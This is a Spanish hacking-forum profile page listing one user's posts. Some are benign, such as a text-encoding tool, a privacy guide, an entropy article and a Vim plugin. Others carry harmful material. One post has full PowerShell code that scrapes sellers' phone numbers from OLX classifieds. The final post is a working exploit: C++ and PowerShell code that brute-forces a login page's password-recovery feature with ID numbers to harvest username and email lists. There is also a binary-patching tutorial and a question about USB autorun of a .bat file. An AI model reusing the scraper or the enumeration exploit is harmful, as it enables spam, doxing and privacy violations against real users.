Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - andergedon

#1

Hola amigos de underc0de, después de estar mucho tiempo inactivo (Los estudios me sacan de aquí) he vuelto con un pequeño código que me pasé la tarde haciendo para volver a tomar la práctica con los códigos jeje  8)
Se trata de una herramienta de conversión para texto, con opciones para convertir a ASCII, binario, hexadecimal, base64, decimal y ROT13.

El código lo pueden encontrar en el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Una vez compilado su uso es muy sencillo.

Código: php
      Opciones:
      --asc = ascii --bin = binary
    --hex = hex --b64 = base64
    --dec = decimal --r13 = ROT13
   
    --all = todos (default)
    --cb  = copia el output al portapapeles
    --to xxx = convert to xxx


Ejemplo:
Código: php
asciitox.exe "underc0de" --to all



si queremos copiar el contenido de alguna de las salidas colocamos al final la opcion "--cb"
Ejemplo:
Código: php
asciitox.exe --asc "underc0de" --to b64 --cb



Eso es todo por hoy colegas, siéntanse libres si quieren aportar al código, etc.. Nos leemos.

#2
Hola amigos, estoy tratando de aprender sobre radare2. El problema es que cuando intento correr el programa en el depurador no puedo seguir analizándolo, es decir radare2 no me deja colocar instrucciones (breakpoints, seek's, write,etc) mientras el programa está ejecutándose.


¿Alguna solución o simplemente la característica no está disponible? Lo que intento es depurar/analizar mientras el programa corre como lo haría con Olly.

Gracias de antemano.
#3


Que tal colegas. Hoy les enseñaré a aprovecharse del flujo de un programa para modificar determinadas partes de su funcionamiento.
Es recomendado tener al menos conocimiento básico sobre ingeniería inversa, ollydbg, y algo de lenguaje ensamblador.

El ejecutable que estaré utilizando en el ejemplo, es un programa sencillo que hice hace mucho tiempo mientras practicaba las GUI de C++. Lo he encontrado entre la basura de mis carpetas y vi que se prestaba para lo que quiero demostrar, Lo pueden descargar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, dicho esto, empecemos  ;D

El programa simplemente genera 4 colores aleatorios creando así una paleta de colores, la app tiene una opción que permite buscar imagenes en el navegador que contengan los colores de la paleta generada.

   

Lo que vamos a hacer es modificar esa URL que genera el programa y colocar la que nosotros deseemos.
Manos a la obra 8)

Primero buscaré todas las strings relevantes en relación al botón que llama la función para abrir el navegador. Empezaré con la string "Search image with this colors!" y presionamos F2 para poner un BreakPoint. También localizaré la string "labs.tineye.com" que es la URL que abre el navegador al momento de pulsar el botón, podemos asumir que en algún momento se pasará como argumento a una función. Por ahora colocaré un BreakPoint ahí también.


Bien, una vez hecho esto intentemos comenzar la depuración del ejecutable y esperar que se tope con alguno de nuestros BreakPoints antes colocados.
Presionamos el botón que nos interesa, el que llama a la función para buscar las imagenes. Nos topamos con uno de los BreakPoints, el de la URL y vemos que la instrucción  manipula esa string a partir de la posición 00A4CC4C


A partir de este punto avanzaré hasta encontrar el punto en donde se abre nuestro navegador para tener puntos de inicio/final. Luego de ir paso a paso hallamos ese punto final en 00405158.

Ya que sabemos donde está nuestro punto final podemos analizar el flujo del programa con más calma. Si volvemos a ejecutar el programa y vamos de nuevo instrucción por instrucción notamos que en 0040512B la dirección de nuestra URL completa es almacenada en el registro EAX


La dirección que almacena nuestra string con la URL es entonces 0028F6F2

Lo que voy a hacer acontinuación es cambiar el contenido de la memoria donde es almacenada la URL, lo haré antes de que sea copiado al registro EAX, pues parece que el registro es utilizado para mover el string y utilizarlo dentro de la función que llama al navegador. Para hacer esto tenemos que "inyectar" un par de instrucciones en el programa.
Lo primero que vamos a hacer es buscar un espacio "nulo", es decir, un espacio en la memoria bastante alejada en donde no haya ninguna instrucción, byte, etc. Normalmente se idetifican por una serie bastante larga de NOP o DB 00 Yo elegiré la 00A3C34F. A partir de aquí es donde empezaremos a colocar las instrucciones "inyectadas" con el fin de modificar la URL

Tenemos que hacer que nuestro programa salte en algún punto hasta nuestra dirección alejada, para esto buscaremos una instrucción "inofensiva" o una instrucción que no sea tan importante. Elegiré 0040511E   MOV EAX,16. Pues no hace más que copiar 16 al registro EAX. Reemplazaremos esa instrucción por JMP 00A3C34F para que de un salto incondicional hasta nuestra dirección alejada.

Una vez dado el salto empezaremos a modificar la dirección de memoria de la URL.

La url que inyectaré será: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (El link acortado al foro de underc0de) Luego de convertirlo a hexadecimal, quedaría así:
Código: php
676f6f2e 676c2f43 714d4d32 6e00


Y luego de invertirlo para pasarlo mediante el registro quedaría de esta forma:
Código: php
2E6F6F67 432F6C67 324D4D71 006e


Ahora empezaremos a copiar todos esos caracteres mediante EAX a nuestra memoria donde se encuentra la URL. Las instrucciones quedarían algo así

Código: asm
MOV EAX, 2E6F6F67
MOV [0028F6F2], EAX
MOV EAX, 432F6C67
MOV [0028F6F6],EAX
MOV EAX, 324D4D71
MOV [0028F6FA], EAX
MOV EAX, 006e
MOV [0028F6FE], EAX
MOV EAX, 16
JMP 00405123



Estas instrucciones son las que colocaremos en nuestra dirección alejada (00A3C34F). Si ejecutamos un poco estas instrucciones podemos ver como nuestra URL va cambiando.


Una vez terminada la modificación de la memoria hay que "dejar todo como estaba y fingir que nada pasó" por eso colocamos ese 16 en EAX y volvemos con un salto al punto justo después de donde aplicamos el primer salto. Esto para que el programa siga su curso "normalmente"

Ejecutamos nuestro programa dentro del depurador para comprobar y...


Búm! Hemos conseguido que el programa nos envíe a un sitio totalmente diferente al que conducía originalmente.
Para guardar los cambios damos en click derecho> copy to executable > All modifications.

¡Y listo!


Esto fue todo por hoy, espero que también hayan aprendido algo. ¡Nos leemos!.
#4
Criptografía / Twitter como fuente de entropía
Febrero 03, 2018, 10:04:26 PM
¿Que es entropía?
La entropía es la aleatoriedad recogida por un sistema operativo o aplicación para su uso en criptografía u otros usos que requieren datos aleatorios.


Internet es un desastre caótico, lo que hace que sea una buena fuente de entropía.
Básicamente cuando generamos claves (Digamos RSA 2048) necesitamos verdaderos números aleatorios. No queremos que sean determinados (Basados en fechas/horas o en algún ID) No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En linux se tiene lo que se denomina "pool entropy" o conjunto de entropía, un conjunto de bits que se supone que son verdaderamente aleatorios. Su agrupación se alimenta de varias fuentes consideradas algo aleatorias (Movimientos del mouse, eventos de red, pulsaciones de teclas, etc.) Para visualizar el contenido de los bits de entropía disponibles en linux puede ejecutar el comando:
Código: bash
cat /proc/sys/kernel/random/entropy_avail


El apoyo de Twitter

Todos sabemos que twitter es una gran fuente de ruido: bots rusos, amenzas a Trump, interacciones humanas, tráfico de malware, etc. Y todo esto es una gran fuente de entropía ya que es bastante aleatoria y tiene un contenido impredecible. La impredecibilidad es una propiedad importante en la seguridad, un adversario no puede conocer o adivinar la salida del generador de números aleatorios.

Pero twitter es público, ¿Es cripográficamente seguro?
Es cierto que el ruido de twitter es público, pero es impredecible. Usar twitter como fuente única de entropía sería un error fatal ¡Pero su sistema lo sabe y ya cuenta con herramientas de entropía! Se pueden mezclar esas fuentes y crear un conjunto bastante caótico con muy buenas propiedades. ¡Mientras más, mejor!

Obteniendo Tweets aleatorios
Twitter permite a cualquier persona extraer una pequeña muestra aleatoria de todos los tweets que se publican en tiempo real, utilizando su No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

Ruido de Twitter(tweets concatenados y codificados en UTF-8)

Se muestran 500KB de tweets sin procesar, la entropía es alrededor de 6.5519 bits por byte (El verdadero valor aleatorio llegaría a 8 ) No es completamente al azar, pero nos acercamos.
Ahora podríamos comprimir los bytes hasta tener una alta entropía (hashing) o mezclarlo con otro generador de números aleatorios.

Ruido luego de mezclar con un generador de números pseudoaleatorios

Esta fuente de entropía no es verdaderamente aleatoria, pues, podemos suponer que habrán muchos hastags (#), links populares y emojis que serán repetitivos dañando nuestro objetivo.
En conclusión: No uses esto para operaciones criptográficas sensibles.


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#5
Seguridad / [Guía] Privacidad online
Diciembre 10, 2017, 01:43:53 PM

El tema de navegar en internet no es seguro ni mucho menos anónimo. Y el número de servicios que ofrecen seguridad para nuestra información crece a la par con el número de compañías dispuestas a vender información acerca de nuestra actividad online. La privacidad es un derecho no una característica de marketing para convencernos de descargar algún software o cambiarnos de proveedor de mail.

Por eso les mostraré las técnicas que yo uso y recomiendo para navegar de forma segura y un poco más tranquila. Es  mejor paranoia que passwords débiles ;D

Utiliza VPN


Por simplifcar, las redes VPN (Red Privada Virtual) añaden una red privada sobre la red principal del usuario. Básicamente, una red VPN toma tu conexión, la encripta y la envía a otro servidor. En lugar de que tu ordenador acuda directamente a una web, primero accede a un servidor intermedio y, desde ahí, entra a la web destino. Al utilizar una VPN solo será visible tu conexión con el servidor intermedio, y este será el que de verdad ejecute las peticiones
Usar un proveedor VPN NO TE HACE ANÓNIMO. Pero te ofrece una mejor privacidad, recuerdo que no utilizamos estas herramientas para actividades ilegales  ;)

* Recomendación de paga (124.95 €) No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
* Recomendacion gratuita  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Utiliza un navegador confiable


El navegador web es la puerta desde la que accedemos a internet. Hoy en día le dedicamos mucho tiempo a este programa, tanto en la computadora como en tu tablet o smartphone, ya que desde él tenemos acceso al correo, a redes sociales, a portales de noticias. Por eso es importante que el software que utlicemos se preocupe por nuestra privacidad
Empecemos por desinstalar Chrome. Punto. Por la simple razón de que la gran 'G' siempre está mirando.

Existen mejores alternativas para navegar y además open-source.
Recomiendo:
*No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
*No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
*No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
*No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Encripta tus correos

¿Cómo me aseguro de que nadie que no esté autorizado/a pueda leer el contenido de mis correos electrónicos? Necesitas enviar información privada y delicada a tus colegas o amigos/as, pero sabes que una vez que los mensajes salen de tu computador, viajan por una tierra de nadie donde pierdes el control.

Existen muchas maneras de encriptar y firmar tus correos No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, etc.
Aún este tipo de proveedores no son muy conocidos por ser conscientes en cuanto a privacidad. Aunque siempre puedes usar herramientas de encriptación de terceros, es recomendado cambiar el servicio.

* Recomendación de paga ($ 59.95)   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
* Recomendacion gratuita No tienes permitido ver los links. Registrarse o Entrar a mi cuenta  | No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Haz búsquedas seguras


Ya dijimos que la gran 'G' siempre está mirando, por lo tanto seguir usando Google como buscador en este punto sería...
Recomiendo como alternativa
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta es open-source y puede llegar a ser acertado como otros buscadores populares, ya que se encarga de recopilar los resultados que arrojan otros motores de búsqueda conocidos. Sin publicidad, sin guardar tus búsquedas, sin rastreos. Otras buena alternativa es No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Tu móvil también...


Ya se ha hablado (y no muy bien) acerca de los servicios de mensajería instantánea y la privacidad. ¿Estará espiando alguien nuestros mensajes? No podemos saberlo, pero tenemos la posibilidad de escoger otra app más segura que WhatsApp, por ejemplo.

Por suerte existen algunas alternativas recomendadas, entre ellas:

*No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
*No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (Como Mr.Robot  8))

Ambas disponible para Android y iOs




Allá arriba también deberías...


Con el paso de los años la nube se ha vuelto imprescindible para todo, porque nos permite alojar archivos sin que ocupen espacio físico dentro de nuestros dispositivos. Pero es importante centrarse siempre en la seguridad.
Asegura tus servicios de almacenamiento en la nube. Dropbox, Google Drive, OneDrive, iCloud. Todos han sido criticados y atacados por presumir sobre seguridad pero husmear y filtrar bastante. Como alternativa:

*Recomendación de paga ($10) No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
*Recomendación gratuita No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Encripta tus archivos locales

El principal método para que mantener a salvo tus datos e información privada es evitar que nadie tenga acceso.
Siempre es bueno mantener los archivos de tu pc encriptados, esta práctica cada vez es más popular entre los usuarios promedio y así debería continuar. Para mi la mejor herramienta y bastante popular en lo que hace es No tienes permitido ver los links. Registrarse o Entrar a mi cuenta aunque también es recomendada No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




No olvides tus contraseñas

De nada sirve haber seguido todos los pasos y tener una contraseña "1234" Creo que todos conocemos las características de una buena contraseña (numeros,mayusc,signos,etc...) Un truco que yo utilizo para 'cifrar' mis contraseñas y recordarlas siempre, es tomar una frase que recuerdes y colocar cada letra inicial de ella, respetando signos de puntuación
Ejemplo: "En el club de la pelea, luchas contra TODAS las cosas que odias en esta vida." = "Eecdlp,lcTlcqoeev."

Otra técnica que también he utilizado es escribir mi contraseña y en vez de presionar la tecla, moverme una tecla arriba y a la izquierda.
Ejemplo: pass= "undercode" | arriba y a la izquierda= "7he34d9e3"

Luego de muchas contraseñas quizá necesites un administrador para ellas. Recomiendo utilizar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta , no se necesita sincronización ni acceso a internet. Lo que promete mantener tus contraseñas completamente seguras.




Recursos recomendados sobre privacidad

*No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
*No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
*No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
*No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Bueno undercoders esto es todo, espero que haya sido útil  ;D

CitarArgumentar que no te importa la privacidad porque no tienes nada que esconder, no es diferente a argumentar que no te importa el derecho a la libertad de expresión porque no tienes nada que decir

-E. Snowden
#6
Hola undercoders! Hice un pequeño script para comprobar si uno o más correos han sido filtrados en algún momento. El script utiliza la API de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para confirmar. Solo necesitamos un archivo emails.txt con todos los correos a testear para empezar a correr el script y luego si lo deseamos exportar todos los positivos a otro archivo



Código: php
if((test-path "emails.txt") -eq $false){
    write-error "Archivo 'emails.txt' faltante"
}

$emails = get-content emails.txt
$ouput

foreach($mail in $emails){
   
   if($mail -notmatch '[a-zA-Z0-9.-]+@\w+\.\w+'){continue}

   $test = invoke-webrequest "https://hacked-emails.com/api?q=$mail"
   if($test.content -match '(:0)(?=,"data")'){
       write-host "Ninguna entrada para $mail !" -foreground green
       write-host "`n============================`n"
    }else{
if($test.content -match '(\d+)(?=,"data")'){}
$matches = ([regex]'https:[a-zA-Z\\\/-]+\.com\\\/leak\\\/[a-zA-Z0-9-.]+').Matches($test.content);

write-host "[x]" $matches.Count " Entradas para $mail [+] `n" -foreground red
    $output += @("$mail`n")
foreach($link in $matches){
    write-host "E-mail filtrado en:" ($link -replace "\\") -foreground red
    $output += @($link -replace "\\")
}
$output += @("`n==========================`n")
write-host "`n============================`n"
    }

}

write-host "Exportar e-mails filtrados? S/N > " -NoNewLine
   $x=read-host

    if($x -eq 's' -or $x -eq 'S'){set-content "output.txt" $output}
#7
Otros lenguajes / Sintaxis de Cramel en VIM
Noviembre 05, 2017, 12:12:40 AM
Que tal colegas. Hice mi primer No tienes permitido ver los links. Registrarse o Entrar a mi cuenta-plugin y lo orienté hacia No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y su amigable sintaxis  ;D



Para instalarlo

Puedes clonar el repositorio No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y usar tu Plug-Installer favorito, recomiendo utilizar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta o No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Código: php
Plug 'https://github.com/Andergedon/cramel-vim'


Si prefieres instalarlo manualmente copia los archivos .vim dentro del repositorio: 
y pegalos en su respectiva carpeta dentro de tu ...\Vim\VimFiles



Y listo! Reiniciamos nuestro vim y ya podremos visualizar el coloreado en la sintaxis de Cramel.



BONUS

Para opciones de completación de código yo utilizo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Que se encarga de completar las palabras dentro de la sesión de VIM abierta



Trataré de seguir actualizando el plugin, nos vemos undercoders.
#8
Que tal amigos, tengo un tiempo aprendiendo c++ y ya manejo desde lo fundamental hasta la POO, tengo buen planteamiento algorítmico, conozco las estructuras de datos, etc. 
¿Con que temas creen que debería continuar para seguir aprendiendo en la programación?
#9



Que tal todo Underc0ders? Hoy vengo con una pequeña herramienta que desarollé mientras aprendía algo de Powershell.
Llamada No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y se dedica básicamente a recopilar números telefónicos de la página No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

OLX es un sitio web de clasificados, donde las personas pueden vender y comprar una gran variedad de cosas, nuevas o usadas. Algo parecido a mercadolibre y otros sitios de compra/venta. Una de las características de OLX es permitir que cualquier vendedor publique su numero de teléfono con el fin de que un potencial cliente tenga la posibilidad de contactar con el vendedor de una forma rápida y sencilla. De esta manera también, algunos negocios se dedican a recopilar estos numeros de teléfono con el fin de hacer spam sobre su producto o servicio. Los estafadores aprovechan esto para hacer No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y otros ataques. O algún sitio web puede utilizarlo para almacenar tu información en alguna No tienes permitido ver los links. Registrarse o Entrar a mi cuenta relacionada a numeros de teléfono, nombre y dirección.

Pueden encontrar la herramienta en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
El uso de la herramienta es bastante sencillo, para ponerla a correr tendremos que usar a nuestro amigo Google junto con sus dorks.
Citarsite:olx.com.ve

para resultados más específicos se puede jugar un poco con los dorks por ejemplo:
Citarsite:olx.com.ve iphone Caracas 
Así recopilaremos los numeros de personas que estén vendiendo un iphone en la ciudad de Caracas.

Podemos seleccionar los enlaces que han sido indexados las últimas 24 horas, de esa manera aseguraremos que los anuncios de venta no han expirado o hayan sido removidos.


copiamos y pegamos el link de la búsqueda Google, abrimos nuestro script y dejamos que haga su trabajo. Todos los números que fueron encontrados serán almacenados en 'numeros.txt'.


Por ahora la herramienta solamente extrae números telefónicos de Venezuela, estaré actualizándola a otros países tan pronto como pueda.

Source-code:

Código: dos
new-item links.txt -type file
new-item numeros.txt -type file
cls

write-host "
_______  __        ___   __           
|_   __ \[  |     .'   `.[  |         
  | |__) || |--. /  .-.  \| |  _   __ 
  |  ___/ | .-. || |   | || | [ \ [  ]
_| |_    | | | |\  `-'  /| |  > '  < 
|_____|  [___]|__]`.___.'[___][__]`\_]
                                       By:Andergedon
    https://github.com/Andergedon/
" -foreground green
write-host "Google Link >" -foreground yellow

$link=read-host

write-host "Extrayendo Links OLX..." -foreground green
(New-Object System.Net.WebClient).DownloadFile($link, 'temp.txt')
write-host ">Listo" -foreground green
$x=(get-content temp.txt)[1..6]

foreach($line in $x){

     $z=$line
     for($i=0; $i -lt $z.length; $i++){
          if($z[$i] -eq '<' -and $z[$i+1] -eq 'c' -and $z[$i+2] -eq 'i' -and $z[$i+3] -eq 't' -and $z[$i+4]-eq'e' -and $z[$i+5]-eq '>'){
            $i+=6
            $j=0
            $K=0..100
            while($z[$i]-ne'.'){$i++}
               
            while($z[$i]-ne'<'){
                $K[$j]=$z[$i]
                $i++
                $j++
             }$union=-join $K[0..($j-1)]
             add-content links.txt ("https://m"+$union)
          }
     }
}remove-item temp.txt

$x=(get-content links.txt)
foreach($link in $x){
write-host "Buscando numero en: $link " -foreground yellow
(New-Object System.Net.WebClient).DownloadFile($link, 'temp.txt')

$z=(get-content temp.txt -totalcount 11)[-1]

     for($i=0; $i -lt $z.length; $i++){
          if($z[$i]-eq'0' -and $z[$i+1]-eq'4' -and $z[$i+2]-eq'1' -and ($z[$i+3]-eq'2' -or $z[$i+3]-eq'4' -or $z[$i+3]-eq'6')){
               $K=0..11
               $j=0
               $l=$i
               for($j=0;$j-lt 11; $j++){
                    $K[$j]=$z[$l]
                    $l++
               }$aux=0
               for($j=0; $j -lt 11; $j++){
                    if($K[$j] -gt '9'){$aux=1}
               }
               if($aux-eq 0){
               $NUM=-join $K[0..10]
               write-host "Numero encontrado: $NUM" -foreground green
               add-content numeros.txt $NUM
               }
          }
     }
}

remove-item temp.txt



Saludos!
#10
Que tal amigos, verán, he querido hacer un autorun para una memoria usb.
Pero al parecer el equipo de windows ha desactivado la opción de que se autoejecuten programas  :-\ ¿Hay alguna otra forma de hacerlo?
Lo que quiero es que al conectar la usb, se ejecute un .bat
Muchas gracias de antemano!
#11

El gobierno de Enrique Pena Nieto espía a defensores de derechos humanos, periodistas y abogados que delinean los mecanismos anti-corrupción, con un sistema cibernético que solamente debería ser usado para combatir al crimen organizado, revela el periódico The New York Times.

Los blancos del espionaje incluyen a los abogados que investigan la desaparición masiva de 43 estudiantes (Ayotzinapa), un académico altamente respetado que ayudó a escribir la legislación anticorrupción, a dos periodistas influyentes y a un abogado estadunidense que representa a las víctimas de abuso sexual por parte de policías.

El sistema o equipo cibernético para el espionaje conocido como No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, fue adquirido en el 2011 por el gobierno de México a la empresa de Israel NSO Group, que asegura haberlo vendido bajo la condición de que no se usara contra la población civil.
El espionaje del gobierno de Peña Nieto se sustenta en la activación del software de Pegasus en los teléfonos inteligentes.

"Es altamente improbable que el gobierno recibiera la aprobación judicial para interceptar los teléfonos", de acuerdo a varios ex funcionarios de los sistemas de inteligencia del gobierno mexicano. Los ex funcionarios, matizaron que el espionaje ilegal en México "es una práctica estándar"


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#12
Muy buenas amigos de Underc0de, después de un tiempo de inactividad (mucho trabajo y clases jeje) vuelvo para mostrarles una vulnerabilidad que se encuentra en algunos paneles de login. No es tan común, pero puede encontrarse por ahí. Por petición del sadmin no revelaré la identidad de la web, pero es la que utilizaré de ejemplo.
Sin más, empecemos a identificar y explotar.

IDENTIFICANDO LA VULNERABILIDAD
--------------------------------------

La vulnerabilidad permite obtener la lista de miembros de un sitio web, cuando este no utiliza protección de censura/cifrado en los correos afiliados a los usernames. Una memberlist puede ser utilizada para ataques de ing. social, spam, doxing, etc.

La vulnerabilidad se encuentra en los paneles de login con la opción de 'recuperar contraseña' Una vez que introducimos nuestro usuario para comprobar que tenemos una cuenta en el sitio nos devuelve un bonito mensaje junto con el correo afiliado a la cuenta, sin ningún tipo de censura.


Si nos devuelve este mensaje o algo parecido, podemos comprobar que SI es vulnerable

Si nos devuelve un mensaje parecido a este.

CitarSe ha enviado un correo a
COR****SAR**@gmail.com

Entonces NO es vulnerable.

Ahora que ya sabemos identificarla, continuemos.


EXPLOTANDO LA VULNERABILIDAD
--------------------------------------

Si observamos el comportamiento de las cabeceras http al tratar de logearnos, comprobamos como y a donde se envian nuestros argumentos colocados en el panel login (usuario y contraseña)


Ahora ya sabemos que 'TC' recibe el parametro del usuario y 'TextC' el de contraseña

Si obtenemos el link GET podemos reescribir nuestro user y pass para acceder de forma automática, quedando algo como esto:

Código: php
http://example.com/Login.aspx?__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJMjQ1MTQ4MDAyD2QWAgIDD2QWAgIhDw8WBh4EVGV4dAULUFNNIE1hcmFjYXkeBlRhcmdldAUGX0JsYW5rHgtOYXZpZ2F0ZVVybAUiaHR0cDovL3d3dy5mYWNlYm9vay5jb20vUFNNTWFyYWNheWRkZGfGZi%2F1Q3fY9CkB44UHgjFxycrA&__VIEWSTATEGENERATOR=F78B3E72&__EVENTVALIDATION=%2FwEWBQL7kOrFBQLs757wDAKFlKGwCgLM9PumDwK81vLUAXZ9c3WJBe6Rgos3yQ1aASODDKbk&TC=USUARIO2&TextC=CONTRASEÑA2&BPase=Acceder


Así podemos acceder a la web de forma directa. Ahora observamos las cabeceras pero esta vez buscando hacia donde se dirigen cuando tratamos de 'recuperar contraseña'

básicamente se obtiene la misma respuesta, lo único que cambia es el argumento 'EVENTTARGET' que pasa de estar vacío a tener como argumento 'LinkButton1' y porsupuesto la contraseña vacía.

Código: php
http://example.com/Login.aspx?__LASTFOCUS=&__EVENTTARGET=LinkButton1&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJMjQ1MTQ4MDAyD2QWAgIDD2QWAgIhDw8WBh4EVGV4dAULUFNNIE1hcmFjYXkeBlRhcmdldAUGX0JsYW5rHgtOYXZpZ2F0ZVVybAUiaHR0cDovL3d3dy5mYWNlYm9vay5jb20vUFNNTWFyYWNheWRkZGfGZi%2F1Q3fY9CkB44UHgjFxycrA&__VIEWSTATEGENERATOR=F78B3E72&__EVENTVALIDATION=%2FwEWBQL7kOrFBQLs757wDAKFlKGwCgLM9PumDwK81vLUAXZ9c3WJBe6Rgos3yQ1aASODDKbk&TC=USUARIO1&TextC=&


Y de esa manera se ingresa a la web de recuperar contraseña de forma directa, colocando los argumentos en la URL y devolviendo el correo asociado (si es que el usuario existe, claro)


Para automatizar el proceso utilizaremos fuerza bruta para dar con los usuarios y obtener sus correos. En la web que uso como ejemplo, el nombre de usuario es el número del documento de identidad.

Para ello diseñé un programa, utilicé C++ y PowerShell. La verdad estoy muy seguro de que se puede hacer mucho más rápido con otros lenguajes de programación, y confieso que no me preocupé por la portabilidad del código, aún así lo dejo por si alguien desea tomarlo como referencia y saber mas o menos como funciona el proceso.

Código: cpp
#include <iostream>
#include <fstream>
#include <string.h>
#include <windows.h>
using namespace std;

char cedula[320];
char aux[] = {"http://example.comLogin.aspx?__LASTFOCUS=&__EVENTTARGET=LinkButton1&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJMjQ1MTQ4MDAyD2QWAgIDD2QWAgIhDw8WBh4EVGV4dAULUFNNIE1hcmFjYXkeBlRhcmdldAUGX0JsYW5rHgtOYXZpZ2F0ZVVybAUiaHR0cDovL3d3dy5mYWNlYm9vay5jb20vUFNNTWFyYWNheWRkZGfGZi%2F1Q3fY9CkB44UHgjFxycrA&__VIEWSTATEGENERATOR=F78B3E72&__EVENTVALIDATION=%2FwEWBQL7kOrFBQLs757wDAKFlKGwCgLM9PumDwK81vLUAXZ9c3WJBe6Rgos3yQ1aASODDKbk&TC="};


char URL[600] = {"http://example.com/Login.aspx?__LASTFOCUS=&__EVENTTARGET=LinkButton1&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJMjQ1MTQ4MDAyD2QWAgIDD2QWAgIhDw8WBh4EVGV4dAULUFNNIE1hcmFjYXkeBlRhcmdldAUGX0JsYW5rHgtOYXZpZ2F0ZVVybAUiaHR0cDovL3d3dy5mYWNlYm9vay5jb20vUFNNTWFyYWNheWRkZGfGZi%2F1Q3fY9CkB44UHgjFxycrA&__VIEWSTATEGENERATOR=F78B3E72&__EVENTVALIDATION=%2FwEWBQL7kOrFBQLs757wDAKFlKGwCgLM9PumDwK81vLUAXZ9c3WJBe6Rgos3yQ1aASODDKbk&TC="};


char URL2[] = {"&TextC=&"};
char TC[10];
char correo[50];

void wordlist();
void script();
void searcher();
bool request(char *&);

ofstream output;

int main(){
cout<<"\n\n\n";

cout<<"MEMBER LIST BRUTEFORCE || By: TOMJASP3R"<<endl;
wordlist(); //funcion que carga la wordlist a la variable cedula
int j=0;
do{

for(int i=0; i<strlen(cedula); i++){ //almacena una de las cedulas en TC
if(cedula[j] != ',' && cedula[j]!= '.'){
TC[i]=cedula[j];
}
if(cedula[j]==','){
break;
}
j++;
}

j=j+1;

cout<<"BUSCANDO USUARIO: "<<TC<<endl;

strcat(URL,TC); //..
strcat(URL,URL2); //armando la URL
fflush(stdout); //..
script(); //funcion que corre el script PowerShell

strcpy(URL,aux);


output.open("memberlist.txt");
searcher(); //funcion que busca el correo dentro del html

system("del C:\\users\\desktop\\html.txt");

}while(cedula[j]!='.');
output.close();
return 0;
}

void wordlist(){

ifstream archivo("wordlist.txt");

long cont=0;

if(archivo.fail()){
cout<<"ERROR // WORDLIST NO ENCONTRADO"<<endl;
}

else{
while(!archivo.eof()){
archivo.getline(cedula,sizeof(cedula));
}
}

}

void script(){//creando sript PowerShell

ofstream script;
script.open("download.ps1");

script<<"echo \"BUSCANDO CORREO\" "<<endl;
script<<"$url = \""<<URL<<"\""<<endl;
script<<"$output = \"C:\\users\\desktop\\html.txt\""<<endl;
script<<"Import-Module BitsTransfer"<<endl;
script<<"Start-BitsTransfer -Source $url -Destination $output"<<endl;
script<<"echo LISTO"<<endl;
script.close();

system("download.ps1");

}

void searcher(){//buscando correo en el HTML descargado
bool K=false;
ifstream html ("C:\\users\\desktop\\html.txt");

char *line;

line = new char[3000];

while(!html.eof()){//leyendo html hasta encontrar la linea donde se encuentra el correo
html.getline(line,3000);
if(request(line)==true){
break;
}

else{
continue;
}
}

int j=0;

for(int i=0; i<strlen(line); i++){

if(line[i] == 'a' && line[i+1] ==' ' && line[i+2]=='a'){//extrayendo correo y guardando en archivo txt

do{
correo[j]=line[i+3];
j++;
i++;

}while(line[i+3]!='<');
cout<<"CORREO ENCONTRADO!!: "<<correo<<endl;
output<<correo<<" || "<<TC<<endl;
K=true;
break;
}
}

if(K==false){
cout<<"USUARIO NO REGISTRADO"<<endl;
}

delete [] line;

}

bool request(char *& linea){

for(int i=0; i<strlen(linea); i++){

if(linea[i]=='3' && linea[i+1]=='9' && linea[i+2]=='4'){
return true;
}
}
return false;
}


En resumen, el programa construye la URL de acuerdo a un wordlist.txt con el nombre de los usuarios
esa URL la utiliza en un script de powershell para descargar el HTML de la página
una vez descargado el HTML, el programa busca la cadena de texto donde se encuentra el correo.
Si este se encuentra lo almacena en otro arhivo de texto plano.
Y así susesivamente hasta probar todos los usuarios.



Y de esa manera obtenemos la lista de miembros usuario/correo registrados en la web.

